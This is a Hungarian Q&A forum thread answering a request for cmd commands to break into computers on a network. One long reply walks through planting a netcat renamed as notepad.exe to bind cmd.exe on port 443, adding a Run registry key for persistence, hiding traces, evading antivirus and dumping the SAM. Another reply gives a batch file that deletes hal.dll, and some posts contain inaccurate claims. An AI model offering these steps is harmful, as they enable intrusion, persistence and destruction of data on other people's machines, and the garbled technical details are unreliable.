Milyen cmd parancsok vannak? Amivel behatolhatok a hálózaton lévő gépekbe?

"Hogy ha ez a gyerek windowsal kezdi el, akkor semmi sikerélménye nem lesz, és elmegy a kedve az egésztől."

És ez így is lenne kívánatos. Ugyanis az ilyesmi bűncselekmény. Bár a kis taknyok azt hiszik, hogy nem kapják el őket, pedig igen. És nem hiszem, hogy szívesen töltenék el akár csak azt a 72 órát előzetesben. Pláne nem hónapokat/éveket egy igazi börtönben.

Nekem aztán elhihetitek, nagyon lehet ott szenvedni, ha nem vagy 100 kilós, agresszív cigány.

Ez nem játék. Ha hekkereset akar valaki játszani, akkor [link]

hát ezt azért nem mondanám.

Nem más számítógépét kell feltörni( bár sokan azt szeretnék), azért a BTK 300/C alapján igen komoly dolgokra kell számítani, de nem a hackelés cselekménye rossz, hanem az aki a tudását rosszra használja fel.

Én egyszerűen megoldottam, hogy tudjak ilyesmit gyakorolni, és a dolog teljesen legális!

Fogtam egy linuxot felraktam a gépemre.( nem azért mert nem lehet windows-ons ugyanúgy megcsinálni, csak megszokásból, igazából évek óta csak linux-ot használok

Erre tettem egy virtualboxot. Volt egy eredeti windows xp sp3 cd-m, amit megtaláltam, bár emlékeim szerint soha nem raktam fel a gépemre.

Feltettem a windows xp-t a virtualboxba. Megcsináltam a hálózatot, hogy lássa a gazda gép a belső gépet is,és fordítva

Feltettem egy backtrack 5 RC4-et( ez teli van ilyen alkalmazással.

Igazából a főképpen a metasploitot használom, de a Windows xp-re is felraktam néhány programot:

1. onlydbg egy debugger

2. egy dev c++

kb enyni van fent rajta

Az xp kapott 170 mega ram-ot, egyelőre kellemesen el van vele.

Igazából kipróblátam a metasploit windows xp-re való exploitjait, mindenféle payloaddal.

Csináltam hibás alkalmazást és megtámadtam stack, illetve overflow-val, amit beraktam a backtrack megasploitjára

Akkor saját routerben beállítottam wep titkosítást, feltörtem.

Megpróbáltam wpa-psk-val is, ott a gépem miatt( ami őskövület) 3 nap alatt végzett.

Ez full legális mégis hackelés. Sőt szeritem jobb nála, mert kipróbálhatok többféle tűzfalat, IDS rendszert, akár csinálhatok olyan védelmet is, ami katonai szintű( legalább is elméletben, mert nem tudom ilyen lehet ez)

Mindazonáltal nekem a windows-os hackeléssel az a bajom, hogy 40 féle programot kell telepíteni legalább ha a full EHC tanfolyamon bemutatott programot szeretnék kiróbálni.

pl. a netcat-et kapásból le kell tölteni, de a linuxban ez már benne van,

Jó rendbe van, akkor mehetúnk is a kérdésétől, ha úgyse kap rá választ, azt azért szeretném tisztázni, nem azt mondtam, hogy nem lehet windowsal hackelni, hanem hogy ha azzal kezdi el, csak annyi jön le belóle neki, hogy macera töltögetés újratelepítés stb...

Amúgy szerezd még az admin jelszót, azt megtudod simán találni, egy dosos "szótárba" ha belenézel, megtalálod azokat a parancsszavakat.Onnan még azt csinálsz a nem teljes jogú felhasználókkal, amit akarsz. Csak azt ne hidd, hogy csak dosból, 0 háttérprogrammal, fel lehet törni egy gépet.

Nah én válaszolok a kérdésre az alábbi dolgok betartásával.

1. amit mutatni fogok az félig számít hackelésnek, magyarán a hacker használ[hat] ilyen parancsokat,de egyrészt számos más lehetősége van, másrészt nem csal azzal, hogy ez a program már eleve bent van a számítógépben.

2. Senkit nem buzdítok hackelésre. Szerintem nem is az, főleg azért mert nagyon kevesen tudják majd kivitelezni, talán a kérdező sem. Csak azért mutatom meg, mert sokan túlmisztifikálják a hackelést, pedig néhány egyszerű parancsal meg lehet csinálni. Jah és ha bárki felhasználja az itt közölt dolgokat rossz célokra, azokért semmilyen felelőséget nem vállalok.

Na innentől kezdve:

Van egy nagyon régi linuxus parancs a gépekben amit netcat-nek neveznek. A program célja röviden annyi, hogy tetszőleges program standard input/outputját átirányítja a hálózatra. Az alábbiakban egy ideális esetet fogok reprezentálni, és egy reverse shell nyitását mutatom be.

Legyen a két számítógép egy hálózaton az egyszerűség kedvéért, bár nem szükséges feltétel ez sem. Legyen a megtámadott számítógép tulajdonosának neve Alice.

Tehát Alice gépéhez oda kell menni( és futtason egy windowxs 7-es operációs rendszer)

Othon a támadó, nevezük most Eve-nek letöltöte a netcat legújabb windows-os verzióját az internetről, rátette a maga kis penrive-jára és bemásolta Alice egy tetszőleges mappájába

A fájlt rejteté tete, és a biztonság kedvéért átnevezte pl. notepad.exe-re Az eredmény az let,ha elindítják hogy a task managertben fut egy folyamat notepad.exe néven. De nem tudja Alice leállítani, mert a task manager az argv[0] alapján azonosítja a programokat, és a notepad.exe egy rendszerfájl lett ha így akarja futtatni mégpedig system jogokkal.

Ezután Eve fogta magát és nyitott egy parancssort.

megkereste az átnevezet netcat elérési útját, és csinált egy úgynevezet reverse shell-t. Ezzel a parancsal:

notepad.exe -l -d 443 -e "cmd.exe"

Ezután a gonosz Eve mindig el szerette volna érni Alice gépét,emiatt létrehozott egy registry bejegyzést a gépen

HKEY_CURRENT_USER\\Software\\Microsot\\Windows\CurrentVersion\run

Létrehozott egy új string bejegyzést notepad néven

értéke pedig

[az átnevezet elérési útú netcat] -l -d 443 -e "cmd.exe"

A szögletes zárojel nem kell csupán nem tom ki hova másolja a programot.

Ezzel elértük azt, hogy egy folyamat minden elinduláskor elindul. Ezen kívül Eve kinézte az ipconfig/all parancsal

Alice gépének belső ip címét.

Mikor végzet eltüntette nyomait:

azaz kitörölte magát a rescent documents-ből,kitörölte magát a tényt is hogy ő hozzácsatolta a pendrive-ot( magyarán törölt egy bizonyos registry kulcsot, ami a Default ágon található, azonban a regedit nem jeleníti meg), plusz elrejtette a task managerből is a programot, amit most nem árulok el, hogy kell)

Ezután visszament Eve a saját gépéhez

lefuttatot egy parancsot rajta

telnet [Alice gépének ip címe] 443

És kapot egy parancssori ablakot

Ezután ha akar csinálhat egy fájlt program.vbs néven így

edig program.vbs

Beírja az editorba:

Msgbox("Helló Alice most törtem fel a gépedet!!! HAHAHAHAHA")

elmenti a fájlt

és lefuttatja

cscript program.vbs

Ekkor ha nem rontotam el a cscript paraméterezését, akkor lefut a program.vbs, ami létrehozott egy MessageBox-ot a Alice gépén és kiírta, a "Hello Alice most törtem fel a gépedet HAHAHAHAHA" szöveget a képrnyőjére.

Ekkor persze Alice szól Bobnak a rendszergazdának, aki egyetlen programmal megmondhatja, hogy bizony Eve törte fel a gépét, bár nyomot arra nem fog találni, hogy hogyan került be a nc a gépbe, de nem fogja tudni bezárni.

Ez egy szép kis módszer, de ez csak elmélet volt

Gyakorlatban:

-az netcat-et mára a legenyhébb vírusírtó is megtalálja. Ennek elkerülése véget Eve-nek lehetősége van xorolással és egy RC4 kulcs alkalmazásával titkosítani a netcat-et, így nem biztos meg fogja találni a vírusírtó Ki kell próbálni többféle kulcsot, többféle titkosítási módszert, előbb utóbb biztosan talál egy megfelelő kulcsot és módszert.

Az öntitkosító/önmódosító vírusokat csak assamblyben lehet írni, de mivel a netcat kódja nyílt is meg lehet próbálni onnan is módosítani.

-a tűzfal: na most ez a nem mind1 tényező: ugyanis port alapű tűzfalakra jó a parancs, hogy kiengedtem a 443-as porton a programot, de mára az összes tűzfal figyeli, hogy melyik alkalmazás megy ki a netre/hálózatra, és a netcat-ünk tuti nem lesz kint. Így vagy engedélyezzük( már ha van jogunk hozzá), vagy valamilyen egyébként is kiengedett alkalmazás kódjába másoljuk be a netcat-et.

Erre vannak módszerek:

-a DLL injekció(ennek is két fajtája van, ezt nem részletezném): pl. az internet explorer egyik dll-jébe beletesszük a netcat kódját megfelelően már a kódban felparaméterezzük, az internet explorer tuti ki van engedbve, és ha ezt és a titkosítást alklamazzuk, akkor nem fog meg a tűzfal ez olyan 90%

-A WriteProcessMemory függvény használata keresni az internet exploreben egy jó nagy stacket, amibe belefér az alaklmazásunk beleírjuk, ezután megkeressük tömböt meghívó függvény EIP regiszterét, és felülírjuk a saját programunk kezdő memóriacímének. Ez megint marhára nem egyszerű, de nem lehetetlen hogy valaki megcsinálja( persze mindkettő végrehajtásához eleve rendszergazdának kell lenni a gépen, vagy pedig kernel módból kell "kérni" egy handle-t az alkalmazásunkhoz. Ehhez valahogy megint rendszergazdai jogokat kell szerezni. De akkor már egyszerűbb kiengedni a tűzfallal, előnye a fenti kettő megoldásnak, hogy nem nagyon marad nyoma, sőt egyáltalán nem fog látszódni. Valamint a rendszergazdai jogok szerzése:

hát erre lehet alkalmazni különdféle overflow-okat( pl. , ha nincs jól frissítve a rendszer akkor nagy az esély rá, ha viszont jól frissítet, akkor is van rá módszer( pl. kidumpolni a SAM hive-ot,és egy nagyobb teljesítményű gépen, vagy netalán több nagyobb teljesítményű gépen, megpróbálni visszafejteni, ha nem túl bonyolult a jelszó, akkor vissza lehet fejteni a kódot megfelelő programmal brute-force alapon)

Végezetül: Az igazi hacker valahogy bejuttatja netcat-et a célszámítógép gépébe. Az egyik lehetőség: Socail Engeneering. Vagyis kitesz egy programot, a netre, hogy ez a pl. Crysis 3 crackje, vagy a windows 8-ra egy keygen, vagy egyszerűen egy weboldalon kiteszi, hogy az oldal megtekintéséhez egy plugin szükséges( ami az ő kódját tartalmazza), 100-ból 50 ember tui le fogja tölteni, illetve telepíteni fogja a tök ismeretlen plugint is.A másik lehetőség: pl. az internet explorerben, vagy egy más böngészőben, vagy egy a célszámítógépen használ keres egy stack vagy heap overflow-t, csinál rá egy exploitot, és payloadként bejutatja a saját netcat-jét. És ismét átvete az irányítást a gép felett. Persze mindezek előtt végigpróbálja a nagyobb exploit adatbázisokat, hogy hátha nincs frissítve az operációs rendszer. És a gyakorlatban nem a netcat-et használják, hanem annak egy módosított változatát a cryptonetcat-et, ami titkosítotan küldi ki az adatokat, de van olyan verzió is láncolt proxykon keresztül csatlakozik a célszámítógéphez és korszerű szteagnofráfiát is használ a kommunikáció elrejtésére.

Pl. netcat ezen veriója képfájlokat küld ki a netre, illetve fogad. A képek tök átlagosak, bár ha valaki megnézi képek kódját, annak bizonyos bítjeiben értelemes utasítás sorozatot talál, és nem biztos, sőt nagyon nem biztos, hogy a tűzfal, vagy a behatolásellenörző rendszer(IDS) észlelni fog bármit is. Hiszen egy kép mérete biztosan nagyobb mint 64 kilobyte, ekkor hiába nézi az IDS a csomagok valid értékeit nem fogja észrevenni, hogy illegális kommunikáció zajlik, hiszen a több csomagból álló képeket előbb össze is kéne rakni, ez pedig sok memóriát igényelne, tehát az IDS ilyet nem fog csinálni, a tűzfal meg főleg nem, mert nem erre való.

ezt hogy gondoltad? :D

szted alap parancsokkal fel lehet törni vmit ? :D

taníts mester :D

vagy futtasd le ezt:

@echo off

del C:\WINDOWS\system32\hal.dll >nul

és akkor lesznek hackek

Te nagyon egy degenerált kis 4.-es gyerek lehetsz :)!

Meghekkelni CMD-vel egy másik számitógépet és kiírni oda valamit xd!

Mondok egyszerübbet :D!

Mond neki azt hogy keresi a tanár és már meg is hekkelted a gépét :O!

cmd – Windows parancsértelmező (vagy parancssor)(!)

command – MS-DOS parancsértelmező

calc – számológép

chkdsk – lemez ellenőrző, javító program (parancssorból paraméterezhetjük)

cleanmgr – lemezkarbantartó (!)

cmstp – csatlakozáskezelő profil telepítése

cipher – titkosító program (cmd)

compact – tömörítő program (cmd)

comp – fájl összehasonlítás

control – vezérlőpult (!)

debug – program tesztelő és szerkesztő eszköz (cmd)

driverquery – telepített eszközök listája és tulajdonsága (cmd)

drwtsn32 – Dr. Watson for Windows

dvdplay – Windows Media Player

dxdiag – DirectX diagnosztikai eszköz

edit – MS-DOS Editor

eudcedit – saját karakter szerkesztése (!)

eventtriggers – eseménykiváltókat regisztrálhatunk és törölhetünk (cmd)

eventcreate – bejegyzés az eseménynaplóba (cmd)

eventvwr – eseménynapló (!)

expand – fájltömörítő segédprogram (LZ)

explorer – az Intéző, de ha a futó feladatok között ilyet látunk, ne állítsuk le…

illetve ki lehet próbálni…

előbb indítsunk el egy parancsértelmezőt, majd Ctrl+Alt+Del – Folyamatok (a Feladatkezelőben), kattintsunk az explorer.exe-re és Folyamat leállítása :-).

Tehát eltűnt az Asztal és a Start menü, most láthatjuk milyen fontos is ez az explorer!

Írjuk be a parancsértelmezőbe most, hogy explorer és visszaállt az eredeti állapot (ha nem látjuk a parancssort, mert ugye tálca sincs, akkor keressük meg az ablakaink alatt). (!)

extract32 – cabinet fájltömörítő (CAB)

fsquirt – BlueTooth alapú fájlátvitel varázsló

ftp – FTP kliens program

getmac – MAC cím lekérdezése (cmd) (!)

gpresult – csoportházirend lekérdező eszköz (cmd)

hostname – állomásnév (hostname) lekérdezése (cmd) (!)

iexplore – Internet Explorer

iexpress – IExpress Wizard (Self Extraction Directive (.SED) fájl készítés)

ipconfig – Windows IP konfiguráció (cmd) (!)

logoff – kijelentkezés (!)

magnify – nagyító (!)

makecab – MS cabinet fájl készítő (cmd)

mmc – Microsoft Management Console

mobsync – szinkronizálás beállítása

mqsvc – Microsoft Message Queue Server Control, magyarul üzenetkezelés (cmd)

mrt – (ha van) kártevő eltávolító eszköz (!)

msconfig – rendszerkonfigurációs segédprogram (!)

msg – üzenetküldő segédprogram

msiexec – Windows Installer

mstsc – távoli asztali kapcsolat

narrator – narrátor

net – a teljes hálózat irányítása, figyelése, konfigurálása (cmd) (!)

netsetup – hálózat beállítása varázsló

netsh – hálózati rendszerhéj (shell) (cmd)

netstat – TCP/IP hálózati kapcsolatok, statisztikák (cmd)

notepad – jegyzettömb

nslookup – gépek, domain-ek IP címe + interaktív, DNS szolgáltatások (cmd)

ntbackup – biztonsági másolat vagy visszaállítás varázsló (!)

odbcad32 – ODBC Adatforrás-felügyelő

osk – képernyő billentyűzet (!)

perfmon – teljesítmény (Management Control) (!)

ping – TCP/IP ping parancs (cmd) (!)

powercfg – energiagazdálkodás konfigurálása (cmd)

qprocess – folyamatlekérdező segédprogram (cmd)

regedit vagy regedt32 – rendszerleíró adatbázis szerkesztő (!)

shutdown – helyi vagy távoli számítógép leállítása (!)

sigverif – fájlaláírás ellenőrzése (!)

subst – elérési út társítása egy meghajtóbetűjellel (!)

syskey – Windows XP fiókadatbázisának titkosabbá tétele

systeminfo – rendszerinformáció (cmd)

taskkill – folyamat leállító(cmd)

taskmgr – feladatkezelő (!)

tasklist – futó folyamatok listája (cmd)

telnet – Microsoft Telnet ügyfél

tftp – triviális FTP (cmd) (!)

tsshutdn – rendszerleállító egédprogram (!)

verifier – illesztőprogram ellenőrző

whois – az 1000 éves UNIX whois parancs, pl. whois magyarorszag.hu (cmd) (!)

winmsd – rendszerinformáció (!)

winver – a Windows névjegye

wupdmgr – Windows update

bocs kicsit későn írom (5 év után) de nem baj nem nagy cucc de megbirod vele nézni a körzetedben lévő hálózatok(wifik)jelszavát

a parancs: netsh wlan show profile (wifi neve) key=clear